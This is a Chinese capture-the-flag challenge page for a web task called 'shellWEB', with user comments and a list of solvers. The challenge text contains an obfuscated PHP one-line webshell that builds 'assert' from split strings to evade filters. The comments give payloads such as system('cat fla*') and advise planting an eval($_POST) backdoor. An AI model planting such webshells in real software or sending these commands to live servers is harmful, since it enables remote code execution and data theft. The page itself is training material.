shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 7921
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
zxmals 4年前

assert($_GET['s']) 这就是一句话过狗

回复 0

answer 4年前

就离谱 ?system(dir) .........文件名真不错,爱了爱了

回复 0

iFound 4年前

重点是描述的话,然后是小马用GET构造请求

回复 0

god536 4年前

/?s=system('cat fla*')

回复 4

a2cai 4年前

?我还以为作者要整条狗来看门呢,结果直接$_GET['s']=system('ls')就啥都出来了......

回复 0

ximing 4年前

根据描述应该应该是一个一句话木马,直接提交命令system(ls),然后在直接访问flag文件

回复 0

shan 4年前

用system(dir)来过这个题目,是作者本来的思路吗。看评论好像大家用的方法还挺多种的。

回复 0

yinyue 4年前

不多说了,套娃了解下

回复 1

eleven 4年前

?s=system("cat *.txt")

回复 0

naihe567 4年前

没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx

回复 1

WriteUp

image
harry

3 金币

评分(10)

解题动态

aixuexi666 攻破了该题 34分钟前
57 攻破了该题 2小时前
Thompson 攻破了该题 6小时前
song1997 攻破了该题 6小时前
zzz12311 攻破了该题 8小时前
yonge 攻破了该题 11小时前
ruirui102 攻破了该题 12小时前
祥子1 攻破了该题 12小时前
mixiu 攻破了该题 12小时前
tz001 攻破了该题 13小时前
Seb 攻破了该题 14小时前
迷宫 攻破了该题 14小时前
Cooper.juice 攻破了该题 1天前
SXWM 攻破了该题 1天前
Erec 攻破了该题 1天前
Frenemy 攻破了该题 1天前
hsk_zy 攻破了该题 1天前
谢特恒123 攻破了该题 1天前
admincon 攻破了该题 1天前
muyi111 攻破了该题 1天前
问题反馈